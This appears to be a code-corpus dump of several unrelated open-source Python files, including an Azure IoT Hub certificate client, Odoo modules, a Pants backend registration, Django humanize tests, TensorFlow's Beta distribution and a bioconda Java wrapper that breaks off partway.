'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'certificateName': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[A-Za-z0-9-._]{1,64}$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(certificate_description, 'CertificateBodyDescription')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [201, 200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 201:
deserialized = self._deserialize('CertificateDescription', response)
if response.status_code == 200:
deserialized = self._deserialize('CertificateDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def delete(
self, resource_group_name, resource_name, certificate_name, if_match, custom_headers=None, raw=False, **operation_config):
"""Delete an X509 certificate.
Deletes an existing X509 certificate or does nothing if it does not
exist.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param certificate_name: The name of the certificate
:type certificate_name: str
:param if_match: ETag of the Certificate.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: None or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates/{certificateName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'certificateName': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[A-Za-z0-9-._]{1,64}$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200, 204]:
raise models.ErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def generate_verification_code(
self, resource_group_name, resource_name, certificate_name, if_match, custom_headers=None, raw=False, **operation_config):
"""Generate verification code for proof of possession flow.
Generates verification code for proof of possession flow. The
verification code will be used to generate a leaf certificate.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param certificate_name: The name of the certificate
:type certificate_name: str
:param if_match: ETag of the Certificate.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`CertificateWithNonceDescription
<azure.mgmt.iothub.models.CertificateWithNonceDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`CertificateWithNonceDescription
<azure.mgmt.iothub.models.CertificateWithNonceDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates/{certificateName}/generateVerificationCode'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'certificateName': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[A-Za-z0-9-._]{1,64}$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateWithNonceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def verify(
self, resource_group_name, resource_name, certificate_name, if_match, certificate=None, custom_headers=None, raw=False, **operation_config):
"""Verify certificate's private key possession.
Verifies the certificate's private key possession by providing the leaf
        cert issued by the verifying pre-uploaded certificate.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param certificate_name: The name of the certificate
:type certificate_name: str
:param if_match: ETag of the Certificate.
:type if_match: str
:param certificate: base-64 representation of X509 certificate .cer
file or just .pem file content.
:type certificate: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
certificate_verification_body = models.CertificateVerificationDescription(certificate=certificate)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates/{certificateName}/verify'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'certificateName': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[A-Za-z0-9-._]{1,64}$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(certificate_verification_body, 'CertificateVerificationDescription')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
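    # Illustrative proof-of-possession flow (added for clarity; not generated code).
    # It assumes the service client exposes this operation group as `client.certificates`;
    # resource names and variables below are placeholders.
    #
    #   cert = client.certificates.create_or_update(
    #       'my-resource-group', 'my-hub', 'my-root-ca', certificate=root_pem)
    #   with_nonce = client.certificates.generate_verification_code(
    #       'my-resource-group', 'my-hub', 'my-root-ca', if_match=cert.etag)
    #   # sign the returned verification code with the CA's private key, build a
    #   # verification leaf certificate, then:
    #   client.certificates.verify('my-resource-group', 'my-hub', 'my-root-ca',
    #                              if_match=with_nonce.etag, certificate=leaf_pem)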
| mit | -6,905,391,675,838,449,000 | -4,680,857,237,659,994,000 | 47.55 | 189 | 0.663749 | false |
sergio-incaser/odoo | addons/point_of_sale/report/__init__.py | 381 | 1238 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import pos_users_product
import account_statement
import pos_receipt
import pos_invoice
import pos_lines
import pos_details
import pos_payment_report
import pos_report
import pos_order_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 3,231,633,003,561,193,500 | 5,636,196,344,254,077,000 | 37.6875 | 78 | 0.647011 | false |
odootr/odoo | addons/hr_recruitment/wizard/hr_recruitment_create_partner_job.py | 337 | 3434 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class hr_recruitment_partner_create(osv.osv_memory):
_name = 'hr.recruitment.partner.create'
_description = 'Create Partner from job application'
_columns = {
'close': fields.boolean('Close job request'),
}
def view_init(self, cr, uid, fields_list, context=None):
case_obj = self.pool.get('hr.applicant')
if context is None:
context = {}
for case in case_obj.browse(cr, uid, context['active_ids'], context=context):
if case.partner_id:
raise osv.except_osv(_('Error!'),
_('A contact is already defined on this job request.'))
pass
def make_order(self, cr, uid, ids, context=None):
mod_obj = self.pool.get('ir.model.data')
partner_obj = self.pool.get('res.partner')
case_obj = self.pool.get('hr.applicant')
if context is None:
context = {}
data = self.read(cr, uid, ids, context=context)[0]
result = mod_obj._get_id(cr, uid, 'base', 'view_res_partner_filter')
res = mod_obj.read(cr, uid, result, ['res_id'], context=context)
for case in case_obj.browse(cr, uid, context['active_ids'], context=context):
partner_id = partner_obj.search(cr, uid, [('name', '=', case.partner_name or case.name)], context=context)
if partner_id:
raise osv.except_osv(_('Error!'),_('A contact is already existing with the same name.'))
partner_id = partner_obj.create(cr, uid, {
'name': case.partner_name or case.name,
'user_id': case.user_id.id,
'comment': case.description,
'phone': case.partner_phone,
'mobile': case.partner_mobile,
'email': case.email_from
}, context=context)
case_obj.write(cr, uid, [case.id], {
'partner_id': partner_id,
}, context=context)
return {
'domain': "[]",
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': 'res.partner',
'res_id': int(partner_id),
'view_id': False,
'type': 'ir.actions.act_window',
'search_view_id': res['res_id']
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 3,766,379,065,062,157,300 | -1,239,823,438,012,204,000 | 40.878049 | 118 | 0.5629 | false |
slyphon/pants | src/python/pants/backend/python/register.py | 5 | 2297 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.backend.core.targets.dependencies import Dependencies
from pants.backend.python.python_artifact import PythonArtifact
from pants.backend.python.python_requirement import PythonRequirement
from pants.backend.python.python_requirements import python_requirements
from pants.backend.python.targets.python_binary import PythonBinary
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.backend.python.targets.python_tests import PythonTests
from pants.backend.python.tasks.pytest_run import PytestRun
from pants.backend.python.tasks.python_binary_create import PythonBinaryCreate
from pants.backend.python.tasks.python_repl import PythonRepl
from pants.backend.python.tasks.python_run import PythonRun
from pants.backend.python.tasks.setup_py import SetupPy
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.goal.task_registrar import TaskRegistrar as task
def build_file_aliases():
return BuildFileAliases(
targets={
'python_binary': PythonBinary,
'python_library': PythonLibrary,
'python_requirement_library': PythonRequirementLibrary,
'python_test_suite': Dependencies, # Legacy alias.
'python_tests': PythonTests,
},
objects={
'python_requirement': PythonRequirement,
'python_artifact': PythonArtifact,
'setup_py': PythonArtifact,
},
context_aware_object_factories={
'python_requirements': BuildFileAliases.curry_context(python_requirements),
}
)
def register_goals():
task(name='python-binary-create', action=PythonBinaryCreate).install('binary')
task(name='pytest', action=PytestRun).install('test')
task(name='py', action=PythonRun).install('run')
task(name='py', action=PythonRepl).install('repl')
task(name='setup-py', action=SetupPy).install().with_description(
'Build setup.py-based Python projects from python_library targets.')
| apache-2.0 | 8,384,845,458,574,367,000 | 3,039,393,126,418,606,600 | 44.039216 | 93 | 0.772312 | false |
thinkopensolutions/geraldo | site/newsite/django_1_0/tests/regressiontests/humanize/tests.py | 19 | 3125 | import unittest
from datetime import timedelta, date
from django.template import Template, Context, add_to_builtins
from django.utils.dateformat import DateFormat
from django.utils.translation import ugettext as _
from django.utils.html import escape
add_to_builtins('django.contrib.humanize.templatetags.humanize')
class HumanizeTests(unittest.TestCase):
def humanize_tester(self, test_list, result_list, method):
# Using max below ensures we go through both lists
# However, if the lists are not equal length, this raises an exception
for index in xrange(max(len(test_list), len(result_list))):
test_content = test_list[index]
t = Template('{{ test_content|%s }}' % method)
rendered = t.render(Context(locals())).strip()
self.assertEqual(rendered, escape(result_list[index]),
msg="%s test failed, produced %s, should've produced %s" % (method, rendered, result_list[index]))
def test_ordinal(self):
test_list = ('1','2','3','4','11','12',
'13','101','102','103','111',
'something else')
result_list = ('1st', '2nd', '3rd', '4th', '11th',
'12th', '13th', '101st', '102nd', '103rd',
'111th', 'something else')
self.humanize_tester(test_list, result_list, 'ordinal')
def test_intcomma(self):
test_list = (100, 1000, 10123, 10311, 1000000, 1234567.25,
'100', '1000', '10123', '10311', '1000000', '1234567.1234567')
result_list = ('100', '1,000', '10,123', '10,311', '1,000,000', '1,234,567.25',
'100', '1,000', '10,123', '10,311', '1,000,000', '1,234,567.1234567')
self.humanize_tester(test_list, result_list, 'intcomma')
def test_intword(self):
test_list = ('100', '1000000', '1200000', '1290000',
'1000000000','2000000000','6000000000000')
result_list = ('100', '1.0 million', '1.2 million', '1.3 million',
'1.0 billion', '2.0 billion', '6.0 trillion')
self.humanize_tester(test_list, result_list, 'intword')
def test_apnumber(self):
test_list = [str(x) for x in range(1, 11)]
result_list = (u'one', u'two', u'three', u'four', u'five', u'six',
u'seven', u'eight', u'nine', u'10')
self.humanize_tester(test_list, result_list, 'apnumber')
def test_naturalday(self):
from django.template import defaultfilters
today = date.today()
yesterday = today - timedelta(days=1)
tomorrow = today + timedelta(days=1)
someday = today - timedelta(days=10)
notdate = u"I'm not a date value"
test_list = (today, yesterday, tomorrow, someday, notdate)
someday_result = defaultfilters.date(someday)
result_list = (_(u'today'), _(u'yesterday'), _(u'tomorrow'),
someday_result, u"I'm not a date value")
self.humanize_tester(test_list, result_list, 'naturalday')
if __name__ == '__main__':
unittest.main()
| lgpl-3.0 | -6,286,530,066,794,955,000 | -8,693,316,969,048,008,000 | 43.014085 | 127 | 0.57792 | false |
girving/tensorflow | tensorflow/python/ops/distributions/beta.py | 6 | 14810 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Beta distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import kullback_leibler
from tensorflow.python.ops.distributions import util as distribution_util
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"Beta",
"BetaWithSoftplusConcentration",
]
_beta_sample_note = """Note: `x` must have dtype `self.dtype` and be in
`[0, 1]`. It must have a shape compatible with `self.batch_shape()`."""
@tf_export("distributions.Beta")
class Beta(distribution.Distribution):
"""Beta distribution.
The Beta distribution is defined over the `(0, 1)` interval using parameters
`concentration1` (aka "alpha") and `concentration0` (aka "beta").
#### Mathematical Details
The probability density function (pdf) is,
```none
pdf(x; alpha, beta) = x**(alpha - 1) (1 - x)**(beta - 1) / Z
Z = Gamma(alpha) Gamma(beta) / Gamma(alpha + beta)
```
where:
* `concentration1 = alpha`,
* `concentration0 = beta`,
* `Z` is the normalization constant, and,
* `Gamma` is the [gamma function](
https://en.wikipedia.org/wiki/Gamma_function).
The concentration parameters represent mean total counts of a `1` or a `0`,
i.e.,
```none
concentration1 = alpha = mean * total_concentration
concentration0 = beta = (1. - mean) * total_concentration
```
where `mean` in `(0, 1)` and `total_concentration` is a positive real number
representing a mean `total_count = concentration1 + concentration0`.
Distribution parameters are automatically broadcast in all functions; see
examples for details.
Warning: The samples can be zero due to finite precision.
This happens more often when some of the concentrations are very small.
Make sure to round the samples to `np.finfo(dtype).tiny` before computing the
density.
Samples of this distribution are reparameterized (pathwise differentiable).
The derivatives are computed using the approach described in the paper
[Michael Figurnov, Shakir Mohamed, Andriy Mnih.
Implicit Reparameterization Gradients, 2018](https://arxiv.org/abs/1805.08498)
#### Examples
```python
import tensorflow_probability as tfp
tfd = tfp.distributions
# Create a batch of three Beta distributions.
alpha = [1, 2, 3]
beta = [1, 2, 3]
dist = tfd.Beta(alpha, beta)
dist.sample([4, 5]) # Shape [4, 5, 3]
# `x` has three batch entries, each with two samples.
x = [[.1, .4, .5],
[.2, .3, .5]]
# Calculate the probability of each pair of samples under the corresponding
# distribution in `dist`.
dist.prob(x) # Shape [2, 3]
```
```python
# Create batch_shape=[2, 3] via parameter broadcast:
alpha = [[1.], [2]] # Shape [2, 1]
beta = [3., 4, 5] # Shape [3]
dist = tfd.Beta(alpha, beta)
# alpha broadcast as: [[1., 1, 1,],
# [2, 2, 2]]
# beta broadcast as: [[3., 4, 5],
# [3, 4, 5]]
  # batch_shape [2, 3]
dist.sample([4, 5]) # Shape [4, 5, 2, 3]
x = [.2, .3, .5]
# x will be broadcast as [[.2, .3, .5],
# [.2, .3, .5]],
# thus matching batch_shape [2, 3].
dist.prob(x) # Shape [2, 3]
```
Compute the gradients of samples w.r.t. the parameters:
```python
alpha = tf.constant(1.0)
beta = tf.constant(2.0)
dist = tfd.Beta(alpha, beta)
samples = dist.sample(5) # Shape [5]
loss = tf.reduce_mean(tf.square(samples)) # Arbitrary loss function
# Unbiased stochastic gradients of the loss function
grads = tf.gradients(loss, [alpha, beta])
```
"""
@deprecation.deprecated(
"2019-01-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.distributions`.",
warn_once=True)
def __init__(self,
concentration1=None,
concentration0=None,
validate_args=False,
allow_nan_stats=True,
name="Beta"):
"""Initialize a batch of Beta distributions.
Args:
concentration1: Positive floating-point `Tensor` indicating mean
number of successes; aka "alpha". Implies `self.dtype` and
`self.batch_shape`, i.e.,
`concentration1.shape = [N1, N2, ..., Nm] = self.batch_shape`.
concentration0: Positive floating-point `Tensor` indicating mean
number of failures; aka "beta". Otherwise has same semantics as
`concentration1`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = dict(locals())
with ops.name_scope(name, values=[concentration1, concentration0]) as name:
self._concentration1 = self._maybe_assert_valid_concentration(
ops.convert_to_tensor(concentration1, name="concentration1"),
validate_args)
self._concentration0 = self._maybe_assert_valid_concentration(
ops.convert_to_tensor(concentration0, name="concentration0"),
validate_args)
check_ops.assert_same_float_dtype([
self._concentration1, self._concentration0])
self._total_concentration = self._concentration1 + self._concentration0
super(Beta, self).__init__(
dtype=self._total_concentration.dtype,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
reparameterization_type=distribution.FULLY_REPARAMETERIZED,
parameters=parameters,
graph_parents=[self._concentration1,
self._concentration0,
self._total_concentration],
name=name)
@staticmethod
def _param_shapes(sample_shape):
return dict(zip(
["concentration1", "concentration0"],
[ops.convert_to_tensor(sample_shape, dtype=dtypes.int32)] * 2))
@property
def concentration1(self):
"""Concentration parameter associated with a `1` outcome."""
return self._concentration1
@property
def concentration0(self):
"""Concentration parameter associated with a `0` outcome."""
return self._concentration0
@property
def total_concentration(self):
"""Sum of concentration parameters."""
return self._total_concentration
def _batch_shape_tensor(self):
return array_ops.shape(self.total_concentration)
def _batch_shape(self):
return self.total_concentration.get_shape()
def _event_shape_tensor(self):
return constant_op.constant([], dtype=dtypes.int32)
def _event_shape(self):
return tensor_shape.scalar()
def _sample_n(self, n, seed=None):
expanded_concentration1 = array_ops.ones_like(
self.total_concentration, dtype=self.dtype) * self.concentration1
expanded_concentration0 = array_ops.ones_like(
self.total_concentration, dtype=self.dtype) * self.concentration0
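    # If X ~ Gamma(concentration1, 1) and Y ~ Gamma(concentration0, 1) are
    # independent, then X / (X + Y) ~ Beta(concentration1, concentration0);
    # the two Gamma draws below implement that construction.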
gamma1_sample = random_ops.random_gamma(
shape=[n],
alpha=expanded_concentration1,
dtype=self.dtype,
seed=seed)
gamma2_sample = random_ops.random_gamma(
shape=[n],
alpha=expanded_concentration0,
dtype=self.dtype,
seed=distribution_util.gen_new_seed(seed, "beta"))
beta_sample = gamma1_sample / (gamma1_sample + gamma2_sample)
return beta_sample
@distribution_util.AppendDocstring(_beta_sample_note)
def _log_prob(self, x):
return self._log_unnormalized_prob(x) - self._log_normalization()
@distribution_util.AppendDocstring(_beta_sample_note)
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
@distribution_util.AppendDocstring(_beta_sample_note)
def _log_cdf(self, x):
return math_ops.log(self._cdf(x))
@distribution_util.AppendDocstring(_beta_sample_note)
def _cdf(self, x):
return math_ops.betainc(self.concentration1, self.concentration0, x)
def _log_unnormalized_prob(self, x):
x = self._maybe_assert_valid_sample(x)
return (math_ops.xlogy(self.concentration1 - 1., x) +
(self.concentration0 - 1.) * math_ops.log1p(-x))
def _log_normalization(self):
return (math_ops.lgamma(self.concentration1)
+ math_ops.lgamma(self.concentration0)
- math_ops.lgamma(self.total_concentration))
def _entropy(self):
return (
self._log_normalization()
- (self.concentration1 - 1.) * math_ops.digamma(self.concentration1)
- (self.concentration0 - 1.) * math_ops.digamma(self.concentration0)
+ ((self.total_concentration - 2.) *
math_ops.digamma(self.total_concentration)))
def _mean(self):
return self._concentration1 / self._total_concentration
def _variance(self):
return self._mean() * (1. - self._mean()) / (1. + self.total_concentration)
@distribution_util.AppendDocstring(
"""Note: The mode is undefined when `concentration1 <= 1` or
`concentration0 <= 1`. If `self.allow_nan_stats` is `True`, `NaN`
is used for undefined modes. If `self.allow_nan_stats` is `False` an
exception is raised when one or more modes are undefined.""")
def _mode(self):
mode = (self.concentration1 - 1.) / (self.total_concentration - 2.)
if self.allow_nan_stats:
nan = array_ops.fill(
self.batch_shape_tensor(),
np.array(np.nan, dtype=self.dtype.as_numpy_dtype()),
name="nan")
is_defined = math_ops.logical_and(self.concentration1 > 1.,
self.concentration0 > 1.)
return array_ops.where(is_defined, mode, nan)
return control_flow_ops.with_dependencies([
check_ops.assert_less(
array_ops.ones([], dtype=self.dtype),
self.concentration1,
message="Mode undefined for concentration1 <= 1."),
check_ops.assert_less(
array_ops.ones([], dtype=self.dtype),
self.concentration0,
message="Mode undefined for concentration0 <= 1.")
], mode)
def _maybe_assert_valid_concentration(self, concentration, validate_args):
"""Checks the validity of a concentration parameter."""
if not validate_args:
return concentration
return control_flow_ops.with_dependencies([
check_ops.assert_positive(
concentration,
message="Concentration parameter must be positive."),
], concentration)
def _maybe_assert_valid_sample(self, x):
"""Checks the validity of a sample."""
if not self.validate_args:
return x
return control_flow_ops.with_dependencies([
check_ops.assert_positive(x, message="sample must be positive"),
check_ops.assert_less(
x,
array_ops.ones([], self.dtype),
message="sample must be less than `1`."),
], x)
class BetaWithSoftplusConcentration(Beta):
"""Beta with softplus transform of `concentration1` and `concentration0`."""
@deprecation.deprecated(
"2019-01-01",
"Use `tfd.Beta(tf.nn.softplus(concentration1), "
"tf.nn.softplus(concentration2))` instead.",
warn_once=True)
def __init__(self,
concentration1,
concentration0,
validate_args=False,
allow_nan_stats=True,
name="BetaWithSoftplusConcentration"):
parameters = dict(locals())
with ops.name_scope(name, values=[concentration1,
concentration0]) as name:
super(BetaWithSoftplusConcentration, self).__init__(
concentration1=nn.softplus(concentration1,
name="softplus_concentration1"),
concentration0=nn.softplus(concentration0,
name="softplus_concentration0"),
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=name)
self._parameters = parameters
@kullback_leibler.RegisterKL(Beta, Beta)
def _kl_beta_beta(d1, d2, name=None):
"""Calculate the batchwise KL divergence KL(d1 || d2) with d1 and d2 Beta.
Args:
d1: instance of a Beta distribution object.
d2: instance of a Beta distribution object.
name: (optional) Name to use for created operations.
default is "kl_beta_beta".
Returns:
Batchwise KL(d1 || d2)
"""
def delta(fn, is_property=True):
fn1 = getattr(d1, fn)
fn2 = getattr(d2, fn)
return (fn2 - fn1) if is_property else (fn2() - fn1())
with ops.name_scope(name, "kl_beta_beta", values=[
d1.concentration1,
d1.concentration0,
d1.total_concentration,
d2.concentration1,
d2.concentration0,
d2.total_concentration,
]):
return (delta("_log_normalization", is_property=False)
- math_ops.digamma(d1.concentration1) * delta("concentration1")
- math_ops.digamma(d1.concentration0) * delta("concentration0")
+ (math_ops.digamma(d1.total_concentration)
* delta("total_concentration")))
| apache-2.0 | -438,548,367,028,247,600 | -4,087,623,773,042,768,000 | 35.388206 | 80 | 0.651924 | false |
jerowe/bioconda-recipes | recipes/biopet-vcfstats/1.2/biopet-vcfstats.py | 80 | 3367 | #!/usr/bin/env python
#
# Wrapper script for starting the biopet-vcfstats JAR package
#
# This script is written for use with the Conda package manager and is copied
# from the peptide-shaker wrapper. Only the parameters are changed.
# (https://github.com/bioconda/bioconda-recipes/blob/master/recipes/peptide-shaker/peptide-shaker.py)
#
# This file was automatically generated by the sbt-bioconda plugin.
import os
import subprocess
import sys
import shutil
from os import access
from os import getenv
from os import X_OK
jar_file = 'VcfStats-assembly-1.2.jar'
default_jvm_mem_opts = []
# !!! End of parameter section. No user-serviceable code below this line !!!
def real_dirname(path):
"""Return the symlink-resolved, canonicalized directory-portion of path."""
return os.path.dirname(os.path.realpath(path))
def java_executable():
"""Return the executable name of the Java interpreter."""
java_home = getenv('JAVA_HOME')
java_bin = os.path.join('bin', 'java')
if java_home and access(os.path.join(java_home, java_bin), X_OK):
return os.path.join(java_home, java_bin)
else:
return 'java'
def jvm_opts(argv):
"""Construct list of Java arguments based on our argument list.
The argument list passed in argv must not include the script name.
    The return value is a 4-tuple of the form:
    (mem_opts, prop_opts, pass_args, exec_dir)
